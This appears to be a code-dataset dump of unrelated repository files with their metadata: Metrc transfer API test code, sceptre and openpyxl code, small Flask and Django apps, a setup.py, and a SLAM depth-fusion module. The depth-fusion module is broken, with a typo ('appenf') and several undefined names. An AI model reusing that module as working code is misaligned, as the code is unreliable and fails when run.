# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# # 'IsLayover': False,
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# # 'TransporterDetails': None
# }
# ],
# 'Packages': [
# {
# # 'PackageLabel': traced_package.label,
# # 'HarvestName': '2nd New Old-Time Moonshine Harvest',
# 'ItemName': 'New Old-Time Moonshine Teenth',
# 'Quantity': 1,
# 'UnitOfMeasureName': 'Each',
# 'PackagedDate': get_timestamp(),
# 'GrossWeight': 4.0,
# 'GrossUnitOfWeightName': 'Grams',
# 'WholesalePrice': None,
# # 'Source': '2nd New Old-Time Moonshine Harvest',
# },
# ]
# }
# ]
# }
# track.create_transfers(
# [transfer_data],
# license_number=cultivator.license_number,
# )
# # Step 1b Set up another external Incoming transfer
# # using: POST/transfers/v1/external/incoming
# second_transfer_data = {
# 'ShipperLicenseNumber': cultivator.license_number,
# 'ShipperName': cultivator.name,
# 'ShipperMainPhoneNumber': '18005555555',
# 'ShipperAddress1': 'Mulberry Street',
# 'ShipperAddress2': None,
# 'ShipperAddressCity': 'Oklahoma City',
# 'ShipperAddressState': 'OK',
# 'ShipperAddressPostalCode': '123',
# 'TransporterFacilityLicenseNumber': cultivator.license['number'],
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# 'Destinations': [
# {
# 'RecipientLicenseNumber': cultivator.license_number,
# 'TransferTypeName': 'Beginning Inventory Transfer',
# 'PlannedRoute': 'Hypertube.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# 'GrossWeight': 56,
# # 'GrossUnitOfWeightId': null,
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'xyz',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'xyz',
# 'VehicleModel': 'xyz',
# 'VehicleLicensePlateNumber': 'xyz',
# # 'IsLayover': false,
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# # 'TransporterDetails': null
# }
# ],
# 'Packages': [
# {
# # 'PackageLabel': traced_package.label,
# # 'HarvestName': '2nd New Old-Time Moonshine Harvest',
# 'ItemName': 'New Old-Time Moonshine Teenth',
# 'Quantity': 2,
# 'UnitOfMeasureName': 'Ounces',
# 'PackagedDate': get_timestamp(),
# 'GrossWeight': 56.0,
# 'GrossUnitOfWeightName': 'Grams',
# 'WholesalePrice': 720,
# # 'Source': '2nd New Old-Time Moonshine Harvest',
# },
# ]
# }
# ]
# }
# track.create_transfers(
# [second_transfer_data],
# license_number=cultivator.license_number,
# )
# # Step 2 Find the two Transfers created in Step 1a and 1b
# # by using the date search: GET/transfers/v1/incoming
# traced_transfers = track.get_transfers(
# license_number=cultivator.license_number,
# start=today,
# end=get_timestamp()
# )
# # Step 3 Update one of the Transfers created in Step 1 by
# # using: PUT/transfers/v1/external/incoming
# second_transfer_data['TransferId'] = traced_transfers[0].id
# second_transfer_data['Destinations'][0]['Packages'][0]['Quantity'] = 3
# track.update_transfers(
# [second_transfer_data],
# license_number=cultivator.license_number,
# )
# updated_transfer = track.get_transfers(
# # uid=second_transfer_data['TransferId'],
# license_number=cultivator.license_number,
# start=get_timestamp(past=15),
# end=get_timestamp()
# )
# #------------------------------------------------------------------
# # Transfer templates ✓
# #------------------------------------------------------------------
# # Step 1a Set up a Template using: POST/transfers/v1/templates
# template_data = {
# 'Name': 'HyperLoop Template',
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# # 'DriverLicenseNumber': None,
# # 'PhoneNumberForQuestions': None,
# # 'VehicleMake': None,
# # 'VehicleModel': None,
# # 'VehicleLicensePlateNumber': None,
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Affiliated Transfer',
# 'PlannedRoute': 'Take hyperlink A to hyperlink Z.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': transporter.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'DriverLicenseNumber': 'dash',
# 'PhoneNumberForQuestions': '18005555555',
# 'VehicleMake': 'X',
# 'VehicleModel': 'X',
# 'VehicleLicensePlateNumber': 'X',
# 'IsLayover': False,
# 'EstimatedDepartureDateTime':get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# 'TransporterDetails': None
# }
# ],
# # 'Packages': [
# # {
# # 'PackageLabel': new_package_tag,
# # 'WholesalePrice': 13.33
# # },
# # ]
# }
# ]
# }
# track.create_transfer_templates([template_data], license_number=cultivator.license_number)
# transfer_template = TransferTemplate.create_from_json(track, template_data)
# # Get the template
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today)
# first_template = templates[0]
# # Step 1b Set up another Template using: POST/transfers/v1/templates
# second_template_data = {
# 'Name': 'Tunnel Template',
# 'TransporterFacilityLicenseNumber': cultivator.license_number,
# 'DriverOccupationalLicenseNumber': courier.license['number'],
# 'DriverName': courier.full_name,
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Lab Sample Transfer',
# 'PlannedRoute': 'Take the tunnel, turning left at the donut bar.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=360),
# }
# ]
# }
# track.create_transfer_templates([second_template_data], license_number=cultivator.license_number)
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today, end='2021-04-10')
# second_template = templates[0]
# # Step 2 Find the two Templates created in Step 1a and 1b by
# # using the date search: GET/transfers/v1/templates
# templates = track.get_transfer_templates(license_number=cultivator.license_number, start=today)
# # Step 3 Find a Template by the Template ID number
# # using: GET/transfers/v1/templates/{id}/deliveries
# template_deliveries = track.get_transfer_templates(
# uid=templates[1].uid,
# action='deliveries',
# license_number=cultivator.license_number
# )
# # Step 4 Update one of the Templates created in Step 1
# # using: PUT/transfers/v1/templates
# templates[1].update(name='Premier Hyperloop Template')
# updated_template = {**template_data, **{
# 'TransferTemplateId': templates[1].uid,
# 'Name': 'Premier Hyperloop Template'
# }}
# track.update_transfer_templates([updated_template], license_number=cultivator.license_number)
# template = track.get_transfer_templates(uid=templates[1].uid, license_number=cultivator.license_number)
# print(template.last_modified)
# #------------------------------------------------------------------
# # Outgoing transfers ✓
# #------------------------------------------------------------------
# # Step 1 Find an Incoming Transfer: GET/transfers/v1/incoming
# incoming_transfers = track.get_transfers(license_number=retailer.license_number)
# # Step 2 Find an Outgoing Transfer: GET/transfers/v1/outgoing
# outgoing_transfers = track.get_transfers(
# transfer_type='outgoing',
# license_number=cultivator.license_number
# )
# facilities = track.get_facilities()
# for facility in facilities:
# print('Getting transfers for', facility.license['number'])
# outgoing_transfers = track.get_transfers(
# transfer_type='outgoing',
# license_number=facility.license['number']
# )
# if outgoing_transfers:
# break
# sleep(5)
# # Step 3 Find a Rejected Transfer: GET/transfers/v1/rejected
# rejected_transfers = track.get_transfers(
# transfer_type='rejected',
# license_number=cultivator.license_number
# )
# # Step 4 Find a Transfer by the Manifest ID number: GET/transfers/v1/{id}/deliveries
# transfer_id = 'YOUR_TRANSFER_ID'
# traced_transfer = track.get_transfers(uid=transfer_id, license_number=cultivator.license_number)
# # Step 5 Find The Packages Using the Delivery ID number: GET/transfers/v1/delivery/{id}/packages
# traced_transfer_package = track.get_transfer_packages(uid=transfer_id, license_number=cultivator.license_number)
# # Transfers Wholesale Step 6 Find Packages Wholesale Pricing
# # Using the Delivery ID GET/transfers/v1/delivery/{id}/packages/wholesale
# traced_wholesale_package = track.get_transfer_packages(
# uid=transfer_id,
# action='packages/wholesale',
# license_number=cultivator.license_number
# )
|
[
"keeganskeate@gmail.com"
] |
keeganskeate@gmail.com
|
31757302a42d24ea7a276b1a53b6c2b4abcde137
|
4f9ca946a91759831a1cf2a037c8b4c43c556935
|
/tests/test_template_handlers/test_s3.py
|
db8e926ae5c313d08911c09f34c839e4b52d3f08
|
[
"Apache-2.0"
] |
permissive
|
CitrineInformatics/sceptre
|
591c59b15b2e9bf7c308bcf67e2aa2719c1112dd
|
8ae45066a78c72d53dfe6f1c76dcc64f670c136a
|
refs/heads/main
| 2023-01-09T22:56:50.172103
| 2021-11-29T16:58:15
| 2021-12-23T01:31:37
| 179,547,771
| 0
| 2
|
NOASSERTION
| 2022-10-27T20:55:34
| 2019-04-04T17:48:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,538
|
py
|
# -*- coding: utf-8 -*-
import json
import io
import pytest
from mock import MagicMock
from sceptre.connection_manager import ConnectionManager
from sceptre.exceptions import SceptreException, UnsupportedTemplateFileTypeError
from sceptre.template_handlers.s3 import S3
from unittest.mock import patch
class TestS3(object):
def test_get_template(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.return_value = {
"Body": io.BytesIO(b"Stuff is working")
}
template_handler = S3(
name="s3_handler",
arguments={"path": "bucket/folder/file.yaml"},
connection_manager=connection_manager
)
result = template_handler.handle()
connection_manager.call.assert_called_once_with(
service="s3",
command="get_object",
kwargs={
"Bucket": "bucket",
"Key": "folder/file.yaml"
}
)
assert result == b"Stuff is working"
def test_template_handler(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.return_value = {
"Body": io.BytesIO(b"Stuff is working")
}
template_handler = S3(
name="vpc",
arguments={"path": "my-fancy-bucket/account/vpc.yaml"},
connection_manager=connection_manager
)
result = template_handler.handle()
connection_manager.call.assert_called_once_with(
service="s3",
command="get_object",
kwargs={
"Bucket": "my-fancy-bucket",
"Key": "account/vpc.yaml"
}
)
assert result == b"Stuff is working"
def test_invalid_response_reraises_exception(self):
connection_manager = MagicMock(spec=ConnectionManager)
connection_manager.call.side_effect = SceptreException("BOOM!")
template_handler = S3(
name="vpc",
arguments={"path": "my-fancy-bucket/account/vpc.yaml"},
connection_manager=connection_manager
)
with pytest.raises(SceptreException) as e:
template_handler.handle()
assert str(e.value) == "BOOM!"
def test_handler_unsupported_type(self):
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.unsupported'})
with pytest.raises(UnsupportedTemplateFileTypeError):
s3_handler.handle()
@pytest.mark.parametrize("path", [
("bucket/folder/file.json"),
("bucket/folder/file.yaml"),
("bucket/folder/file.template")
])
@patch('sceptre.template_handlers.s3.S3._get_template')
def test_handler_raw_template(self, mock_get_template, path):
mock_get_template.return_value = {}
s3_handler = S3("s3_handler", {'path': path})
s3_handler.handle()
assert mock_get_template.call_count == 1
@patch('sceptre.template_handlers.helper.render_jinja_template')
@patch('sceptre.template_handlers.s3.S3._get_template')
def test_handler_jinja_template(slef, mock_get_template, mock_render_jinja_template):
mock_get_template_response = {
"Description": "test template",
"AWSTemplateFormatVersion": "2010-09-09",
"Resources": {
"touchNothing": {
"Type": "AWS::CloudFormation::WaitConditionHandle"
}
}
}
mock_get_template.return_value = json.dumps(mock_get_template_response).encode('utf-8')
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.j2'})
s3_handler.handle()
assert mock_render_jinja_template.call_count == 1
@patch('sceptre.template_handlers.helper.call_sceptre_handler')
@patch('sceptre.template_handlers.s3.S3._get_template')
def test_handler_python_template(self, mock_get_template, mock_call_sceptre_handler):
mock_get_template_response = {
"Description": "test template",
"AWSTemplateFormatVersion": "2010-09-09",
"Resources": {
"touchNothing": {
"Type": "AWS::CloudFormation::WaitConditionHandle"
}
}
}
mock_get_template.return_value = json.dumps(mock_get_template_response).encode('utf-8')
s3_handler = S3("s3_handler", {'path': 'bucket/folder/file.py'})
s3_handler.handle()
assert mock_call_sceptre_handler.call_count == 1
|
[
"noreply@github.com"
] |
CitrineInformatics.noreply@github.com
|
4fd3397c966bca4bd99b3bcbfa9a5b5fbef8fcd5
|
52206eea8d48c3568370d4597dfcc6384166dfa6
|
/tests/download.py
|
b29f52825fd634d43ed4650c05f06a9f3dc449ee
|
[
"MIT"
] |
permissive
|
sweeneyngo/birdysis
|
b9b1ba6308682d2cfcaa799a2ba560e954a12704
|
136c75769d07410b74c74d9df353616e615d4f21
|
refs/heads/master
| 2023-06-16T20:22:01.418020
| 2021-07-10T09:12:03
| 2021-07-10T09:12:03
| 352,833,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from birdysis.collect_data import scrape
from birdysis.download import download
download("all_ids.json")
|
[
"sweeneyngo@gmail.com"
] |
sweeneyngo@gmail.com
|
46542fa79977f03009b7bb03b74ec5858e1b234d
|
1dacbf90eeb384455ab84a8cf63d16e2c9680a90
|
/pkgs/openpyxl-2.3.2-py27_0/lib/python2.7/site-packages/openpyxl/utils/__init__.py
|
0c54fa54f4c4b0ce247d980317589d23565ab020
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] |
permissive
|
wangyum/Anaconda
|
ac7229b21815dd92b0bd1c8b7ec4e85c013b8994
|
2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6
|
refs/heads/master
| 2022-10-21T15:14:23.464126
| 2022-10-05T12:10:31
| 2022-10-05T12:10:31
| 76,526,728
| 11
| 10
|
Apache-2.0
| 2022-10-05T12:10:32
| 2016-12-15T05:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 5,507
|
py
|
from __future__ import absolute_import
# Copyright (c) 2010-2015 openpyxl
"""
Collection of utilities used within the package and also available for client code
"""
import datetime
import re
from .formulas import FORMULAE
from openpyxl.compat import basestring
from openpyxl.utils.exceptions import CellCoordinatesException
# constants
COORD_RE = re.compile('^[$]?([A-Z]+)[$]?(\d+)$')
RANGE_EXPR = """
[$]?(?P<min_col>[A-Z]+)
[$]?(?P<min_row>\d+)
(:[$]?(?P<max_col>[A-Z]+)
[$]?(?P<max_row>\d+))?
"""
ABSOLUTE_RE = re.compile('^' + RANGE_EXPR +'$', re.VERBOSE)
SHEETRANGE_RE = re.compile("""
^(('(?P<quoted>([^']|'')*)')|(?P<notquoted>[^']*))!
(?P<cells>{0})$""".format(RANGE_EXPR), re.VERBOSE)
def get_column_interval(start, end):
if isinstance(start, basestring):
start = column_index_from_string(start)
if isinstance(end, basestring):
end = column_index_from_string(end)
return [get_column_letter(x) for x in range(start, end + 1)]
def coordinate_from_string(coord_string):
"""Convert a coordinate string like 'B12' to a tuple ('B', 12)"""
match = COORD_RE.match(coord_string.upper())
if not match:
msg = 'Invalid cell coordinates (%s)' % coord_string
raise CellCoordinatesException(msg)
column, row = match.groups()
row = int(row)
if not row:
msg = "There is no row 0 (%s)" % coord_string
raise CellCoordinatesException(msg)
return (column, row)
def absolute_coordinate(coord_string):
"""Convert a coordinate to an absolute coordinate string (B12 -> $B$12)"""
m = ABSOLUTE_RE.match(coord_string.upper())
if m:
parts = m.groups()
if all(parts[-2:]):
return '$%s$%s:$%s$%s' % (parts[0], parts[1], parts[3], parts[4])
else:
return '$%s$%s' % (parts[0], parts[1])
else:
return coord_string
def _get_column_letter(col_idx):
"""Convert a column number into a column letter (3 -> 'C')
Right shift the column col_idx by 26 to find column letters in reverse
order. These numbers are 1-based, and can be converted to ASCII
ordinals by adding 64.
"""
# these indicies corrospond to A -> ZZZ and include all allowed
# columns
if not 1 <= col_idx <= 18278:
raise ValueError("Invalid column index {0}".format(col_idx))
letters = []
while col_idx > 0:
col_idx, remainder = divmod(col_idx, 26)
# check for exact division and borrow if needed
if remainder == 0:
remainder = 26
col_idx -= 1
letters.append(chr(remainder+64))
return ''.join(reversed(letters))
_COL_STRING_CACHE = {}
_STRING_COL_CACHE = {}
for i in range(1, 18279):
col = _get_column_letter(i)
_STRING_COL_CACHE[i] = col
_COL_STRING_CACHE[col] = i
def get_column_letter(idx,):
"""Convert a column index into a column letter
(3 -> 'C')
"""
try:
return _STRING_COL_CACHE[idx]
except KeyError:
raise ValueError("Invalid column index {0}".format(idx))
def column_index_from_string(str_col):
"""Convert a column name into a numerical index
('A' -> 1)
"""
# we use a function argument to get indexed name lookup
try:
return _COL_STRING_CACHE[str_col.upper()]
except KeyError:
raise ValueError("{0} is not a valid column name".format(str_col))
def range_boundaries(range_string):
"""
Convert a range string into a tuple of boundaries:
(min_col, min_row, max_col, max_row)
Cell coordinates will be converted into a range with the cell at both end
"""
m = ABSOLUTE_RE.match(range_string)
min_col, min_row, sep, max_col, max_row = m.groups()
min_col = column_index_from_string(min_col)
min_row = int(min_row)
if max_col is None or max_row is None:
max_col = min_col
max_row = min_row
else:
max_col = column_index_from_string(max_col)
max_row = int(max_row)
return min_col, min_row, max_col, max_row
def rows_from_range(range_string):
"""
Get individual addresses for every cell in a range.
Yields one row at a time.
"""
min_col, min_row, max_col, max_row = range_boundaries(range_string)
for row in range(min_row, max_row+1):
yield tuple('%s%d' % (get_column_letter(col), row)
for col in range(min_col, max_col+1))
def cols_from_range(range_string):
"""
Get individual addresses for every cell in a range.
Yields one row at a time.
"""
min_col, min_row, max_col, max_row = range_boundaries(range_string)
for col in range(min_col, max_col+1):
yield tuple('%s%d' % (get_column_letter(col), row)
for row in range(min_row, max_row+1))
def coordinate_to_tuple(coordinate):
"""
Convert an Excel style coordinate to (row, colum) tuple
"""
col, row = coordinate_from_string(coordinate)
return row, _COL_STRING_CACHE[col]
def range_to_tuple(range_string):
"""
Convert a worksheet range to the sheetname and maximum and minimum
coordinate indices
"""
m = SHEETRANGE_RE.match(range_string)
if m is None:
raise ValueError("Value must be of the form sheetname!A1:E4")
sheetname = m.group("quoted") or m.group("notquoted")
cells = m.group("cells")
boundaries = range_boundaries(cells)
return sheetname, boundaries
def quote_sheetname(sheetname):
if " " in sheetname:
sheetname = u"'{0}'".format(sheetname)
return sheetname
|
[
"wgyumg@mgail.com"
] |
wgyumg@mgail.com
|
96d955640c214fa097891f16d38bcd5ed4da8453
|
bba4814f15faac544e6721f4233e55b029227764
|
/app.py
|
173889c221b115276f1280125bee070da148d15d
|
[] |
no_license
|
rachl7n/ten-06
|
92bab66d48897dec1d794d171ece2b48e711fbe3
|
4fe38e3651bea7c1a5cb033112db14b8eb237f9e
|
refs/heads/master
| 2022-07-07T11:03:47.162404
| 2020-05-13T17:24:40
| 2020-05-13T17:24:40
| 263,658,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 21 14:57:17 2020
@author: etill
"""
#import statements
from flask import Flask, render_template
#Flask app variable
app = Flask(__name__)
#static route
@app.route("/")
def test():
return render_template("index.html")
@app.route("/1006")
def ten_o_six():
return render_template("1006.html")
@app.route("/personal")
def personal():
return render_template("personal.html")
#start the server
if __name__ == "__main__":
app.run()
|
[
"rachaelclairesullivan@rachaels-mbp.home"
] |
rachaelclairesullivan@rachaels-mbp.home
|
98c90fd8b131550a2728238f0c640581c49629de
|
38b9da5107233b20da0753b8af0c003388a9139f
|
/pypal/wsgi.py
|
a41891b4c4254b7a0a766b5d9a8ac6ef73b031d0
|
[] |
no_license
|
ZTCooper/my_site
|
9bb6bb94ebd713c372fb1f9ef1792af48fd24dcd
|
c648179952eb92e431ffa25765dd39b5d43313f8
|
refs/heads/master
| 2020-03-18T16:16:10.705541
| 2018-06-08T14:33:20
| 2018-06-08T14:33:20
| 134,956,583
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
"""
WSGI config for pypal project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pypal.settings")
application = get_wsgi_application()
|
[
"ztcooper@outlook.com"
] |
ztcooper@outlook.com
|
fcbb5fd03089b7053afd51a4720821afceda74a8
|
e422751d217312de5dec9e970c98c66ca49b6c36
|
/pythonProject/pythonAPI/payload.py
|
c2097f5e3eac8e2807e9e59dff79842f7a30fb95
|
[] |
no_license
|
txtsuresh/Suresh_All
|
408c5fed4d6251187abeea1d371f5f7cd329c4bd
|
0f229d6cad7846e74a1c936430c5c4e3b4f37c1a
|
refs/heads/master
| 2023-01-03T05:01:00.541393
| 2020-11-05T05:04:07
| 2020-11-05T05:04:07
| 292,711,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
def getBody():
body={
"name": "Learn Appium Automation with Java",
"isbn": "xyz1999911120",
"aisle": "227",
"author": "John foe"
}
return body
|
[
"sureshtxt@gmail.com"
] |
sureshtxt@gmail.com
|
4c52adb6f6fef8364a1da13070c1ceac8ee9e493
|
e23d18d44758eb711d1b59d8ba93b45dc337a59d
|
/pose_estimation/depth_map_fusion.py
|
fb99869ef1aa6e64a248ec38abc93f2cac8609e2
|
[] |
no_license
|
summer1719/CNN_SLAM
|
4c5ecbe95854c7872cc41c547600628d9506da2f
|
cefb9f0cb902963715635d5a6814e1d59872ea0a
|
refs/heads/master
| 2020-03-28T10:02:05.598615
| 2018-09-17T02:39:46
| 2018-09-17T02:39:46
| 148,077,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,422
|
py
|
import numpy as np
import cv2
import tensorflow as tf
import sys
import time
def actual_fuse(u,frame,prev_keyframe):
'''
Does the actual fusion of depth and uncertainty map
Arguments:
u: Pixel location
frame: current keyframe of Keyframe class
prev_keyframe: Previous keyframe of Keyframe class
Returns:
Depth and Uncertainty map values at u
'''
u = np.append(u,np.ones(1))
v_temp = frame.D[u[0]][u[1]]*np.matmul(cam_matrix_inv,u) #Returns 3x1 point
v_temp.appenf(1)
v_temp = np.matmul(np.matmul(np.linalg.inv(frame.T),prev_keyframe.T),v_temp) #Return 3x1
v_temp = np.matmul(cam_matrix,v_temp)
v = (v_temp/v_temp[2])[:2]
u_p = (prev_keyframe.D[v[0]][v[1]]*prev_keyframe.U[v[0]][v[1]]/frame.D[u[0]][u[1]]) + sigma_p**2
frame.D[u[0]][u[1]] = (u_p*frame.D[u[0]][u[1]] + frame.U[u[0]][u[1]]*prev_keyframe.D[v[0]][v[1]])/(u_p + frame.U[u[0]][u[1]]) #Kalman filter update step 1
frame.U[u[0]][u[1]] = u_p*frame.U[u[0]][u[1]]/(u_p + frame.U[u[0]][u[1]]) #Kalman filter update step 2
return frame.D[u[0]][u[1]],frame.U[u[0]][u[1]]
def fuse_depth_map(frame,prev_keyframe):
'''
Fuses depth map for new keyframe
Arguments:
frame: New keyframe of Keyframe class
prev_keyframe: Previous keyframe of Keyframe class
Returns:
The new keyframe as Keyframe object
'''
actual_fuse_v = vectorize(actual_fuse)
frame.D,frame.U = actual_fuse_v(index_matrix,frame,prev_keyframe)
return frame.D,frame.U
|
[
"adityasundar99@gmail.com"
] |
adityasundar99@gmail.com
|
e43cfaaeee1b2cd2414081c2358a94cdafd5a010
|
961ef96e417e59ca4a372c056eb059becda48c4f
|
/flask_datepicker/about.py
|
e7a66233ea884c93b9f5e155b5f03aacdde7db24
|
[
"MIT"
] |
permissive
|
mrf345/flask_datepicker
|
394216c0a27641103c7a25468106d47b0b812ba6
|
00d6b024943a73f6aa4a9eb4f4d078f3df6571c4
|
refs/heads/master
| 2021-11-18T05:09:54.506643
| 2021-08-08T19:58:15
| 2021-08-08T19:58:15
| 111,988,960
| 17
| 7
|
MIT
| 2021-08-08T19:58:16
| 2017-11-25T08:36:09
|
Python
|
UTF-8
|
Python
| false
| false
| 157
|
py
|
__version__ = '0.14'
__doc__ = 'A Flask extension for jQueryUI DatePicker.'
__license__ = 'MIT'
__author__ = 'Mohamed Feddad'
__email__ = 'mrf345@gmail.com'
|
[
"mrf345@gmail.com"
] |
mrf345@gmail.com
|
54c4a501d9604fa6651f27159ab896dee43bb7d4
|
abd5867e559d2382764fa82419f78d0b1f63cd81
|
/solutions/pe11_test.py
|
a05b6a4efd5cef194cbc224ca5356be8034d3c49
|
[] |
no_license
|
c-ripper/project-euler
|
5c272169b52f834dee9106409158a38ed5d6ee41
|
1f35c2c9f61031fd5c69ec6c0eb4e5a44f999d24
|
refs/heads/master
| 2023-09-02T02:03:01.451371
| 2021-11-22T10:35:32
| 2021-11-22T10:35:32
| 430,596,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
import unittest
from pe11 import solve
class Pe11Test(unittest.TestCase):
def test_solution(self):
self.assertEqual(solve('pe11_numbers.txt'), 70600674)
if __name__ == '__main__':
unittest.main()
|
[
"oleksandr.berezovskyi@ihsmarkit.com"
] |
oleksandr.berezovskyi@ihsmarkit.com
|
0862f3da61b1c40c3b7e1db8e5dfe036f58d74f1
|
ff7d12f148059b2e143fca7d9a7dbab5375bbb5b
|
/taack 5/флаги.py
|
1d0c685ad2821e2ffe833c528808f96cf39516d4
|
[] |
no_license
|
zaur557/python.zzz
|
e74314ceed039da450992edd0757926cffcaa78c
|
9b518cbd8128ae1f1237de81b53d5342beac26c4
|
refs/heads/master
| 2022-07-23T20:06:01.279841
| 2020-05-03T13:36:16
| 2020-05-03T13:36:16
| 260,771,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
n = int(input())
print('+___ '*n)
for z in range(n):
print('|', z+1, ' /', sep='', end=' ')
print()
print('|__\ '*n)
print('| '*n)
|
[
"noreply@github.com"
] |
zaur557.noreply@github.com
|
c3485c1b87104bdfcb1876b021628d9304df1c00
|
229d7b0de4416b068821eb5193a640a22d5c11e1
|
/setup.py
|
eda9c624e79a1c24fe8aabe04fee2005158be613
|
[
"MIT"
] |
permissive
|
peleg525/large_data_to_teradata
|
99be81930ee82280482238b982f86199b0152641
|
6172ec5f8eb00ac324620ff3501f50be418a21df
|
refs/heads/main
| 2023-06-20T08:01:40.065548
| 2021-07-13T12:38:47
| 2021-07-13T12:38:47
| 385,582,545
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
from distutils.core import setup
setup(
name = 'large_data_to_teradata', # How you named your package folder (MyLib)
packages = ['large_data_to_teradata'], # Chose the same as "name"
version = '0.1', # Start with a small number and increase it with every change you make
license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository
description = 'Push large dataframe to teradata', # Give a short description about your library
author = 'Peleg Wurzel', # Type in your name
author_email = 'Peleg525@gmail.com', # Type in your E-Mail
url = 'https://github.com/peleg525/large_data_to_teradata.git', # Provide either the link to your github or to your website
download_url = 'https://github.com/peleg525/large_data_to_teradata/archive/refs/tags/V_01.tar.gz', # I explain this later on
keywords = ['teradata'], # Keywords that define your package best
install_requires=[ # I get to this in a second
'pandas',
'teradatasql',
'tqdm',
'numpy'
],
classifiers=[
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3', #Specify which pyhton versions that you want to support
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'],
)
|
[
"noreply@github.com"
] |
peleg525.noreply@github.com
|
4d30c6fc70954ba966aeeee5d1eb33d9f5a4aafe
|
d47f58c08828a41576634cc53b86eb519f60f15d
|
/uploads/urls.py
|
7a17822747a49dbe578fe807447992266b6b5709
|
[
"MIT"
] |
permissive
|
doyenraj/mint_upload
|
be8160943540f3c94ed049dee4c941dc9a5fb330
|
1a5ec7b9bf4254f3eb46054b316b40a85beeb5e9
|
refs/heads/master
| 2023-08-30T04:08:15.109202
| 2021-11-01T12:28:51
| 2021-11-01T12:28:51
| 423,398,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
from django.conf.urls import url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from uploads.core import views
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^uploads/simple/$', views.simple_upload, name='simple_upload'),
url(r'^uploads/form/$', views.model_form_upload, name='model_form_upload'),
url(r'^uploads/nft/$', views.nft_upload, name='nft_upload'),
url(r'^admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"rajnish@goodhills-group.com"
] |
rajnish@goodhills-group.com
|
61f98b001adb1e268bc9bd6fcb3bb509e4aefae9
|
4811776819714b138a5dbbc122c8544c44ce3c89
|
/predict/__main__.py
|
ba359ef293d146cfd63e9b11a2e8b10d486290d4
|
[] |
no_license
|
lemfaer/funny
|
0bb412345afa80c6d8f01eca6f4ea7ecf6c80da3
|
748e0be727d2027a7cc8744206403b9561c2fd0b
|
refs/heads/master
| 2021-09-17T11:08:27.841168
| 2018-07-01T08:56:38
| 2018-07-01T08:56:38
| 110,134,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
from predict import Predict
from sys import exit
from args import *
from db import *
import json
data = {
